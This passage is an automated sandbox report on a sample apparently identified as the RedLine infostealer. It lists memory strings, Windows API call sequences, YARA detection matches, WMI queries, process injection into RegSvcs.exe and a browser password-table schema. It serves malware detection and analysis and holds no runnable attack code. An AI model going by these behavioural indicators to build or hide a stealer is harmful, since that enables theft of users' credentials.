                  Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                  Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0023EAFF
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0023ED6A
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0023EAFF
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0022AA57
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00259576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00259576

                  System Summary

                  barindex
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: K3xL5Xy0XS.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: K3xL5Xy0XS.exe, 00000000.00000000.1668594220.0000000000282000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7457949b-d
                  Source: K3xL5Xy0XS.exe, 00000000.00000000.1668594220.0000000000282000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5aa88f64-e
                  Source: K3xL5Xy0XS.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ce0d0384-b
                  Source: K3xL5Xy0XS.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e40ad050-e
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0022D5EB
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00221201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00221201
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0022E8F6
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001CBF400_2_001CBF40
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002320460_2_00232046
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001C80600_2_001C8060
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002282980_2_00228298
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001FE4FF0_2_001FE4FF
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001F676B0_2_001F676B
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002548730_2_00254873
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001ECAA00_2_001ECAA0
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001CCAF00_2_001CCAF0
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001DCC390_2_001DCC39
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001F6DD90_2_001F6DD9
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001DB1190_2_001DB119
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001C91C00_2_001C91C0
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E13940_2_001E1394
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E17060_2_001E1706
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E781B0_2_001E781B
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001C79200_2_001C7920
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001D997D0_2_001D997D
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E19B00_2_001E19B0
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E7A4A0_2_001E7A4A
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E1C770_2_001E1C77
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E7CA70_2_001E7CA7
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0024BE440_2_0024BE44
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001F9EEE0_2_001F9EEE
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E1F320_2_001E1F32
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_016867080_2_01686708
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_008DE7B01_2_008DE7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_008DDC901_2_008DDC90
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: String function: 001E0A30 appears 46 times
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: String function: 001DF9F2 appears 31 times
                  Source: K3xL5Xy0XS.exe, 00000000.00000003.1704782154.0000000004083000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs K3xL5Xy0XS.exe
                  Source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.000000000422D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs K3xL5Xy0XS.exe
                  Source: K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs K3xL5Xy0XS.exe
                  Source: K3xL5Xy0XS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/49@1/1
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002337B5 GetLastError,FormatMessageW,0_2_002337B5
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002210BF AdjustTokenPrivileges,CloseHandle,0_2_002210BF
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_002216C3
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002351CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_002351CD
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0024A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0024A67C
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0023648E
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001C42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_001C42A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2196:120:WilError_03
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeFile created: C:\Users\user\AppData\Local\Temp\aut516D.tmpJump to behavior
                  Source: K3xL5Xy0XS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: tmpD47B.tmp.1.dr, tmpC1A.tmp.1.dr, tmpD48B.tmp.1.dr, tmpD49C.tmp.1.dr, tmpD49D.tmp.1.dr, tmpD4AE.tmp.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: K3xL5Xy0XS.exeReversingLabs: Detection: 63%
                  Source: unknownProcess created: C:\Users\user\Desktop\K3xL5Xy0XS.exe "C:\Users\user\Desktop\K3xL5Xy0XS.exe"
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\K3xL5Xy0XS.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\K3xL5Xy0XS.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: wldp.dllJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: K3xL5Xy0XS.exeStatic file information: File size 1058304 > 1048576
                  Source: K3xL5Xy0XS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: K3xL5Xy0XS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: K3xL5Xy0XS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: K3xL5Xy0XS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: K3xL5Xy0XS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: K3xL5Xy0XS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: K3xL5Xy0XS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: RegSvcs.exe, 00000001.00000002.1882328233.0000000000617000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.0000000004100000.00000004.00001000.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1704029900.0000000003F60000.00000004.00001000.00020000.00000000.sdmp
